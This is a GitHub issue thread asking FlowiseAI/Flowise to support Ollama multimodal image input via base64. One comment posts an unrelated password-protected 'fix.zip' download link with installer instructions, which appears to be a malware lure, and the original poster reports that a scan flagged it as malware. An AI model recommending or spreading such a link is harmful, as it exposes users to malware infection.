### ISSUE TITLE
[FEATURE] support ollama multimodal

### ISSUE THREAD

**Issue by Eyalm321** [FlowiseAI/Flowise#3100]
**Describe the feature you'd like**
Right now, to have the llm recognize an image we have to use expansive apis, please support base64 image, 
Its already support behind the scenes by langchain. basically all we have to do to get this functionality is 
llm.generate(baseUrl, { images: ["base64_string"]})
and it will work with llava model, I tried node script with langchain
seems easy enough to implement Ollama Llava Tool or Adjust the legacy ollama for it

**Additional context**

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Eyalm321** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

malware scan says malware
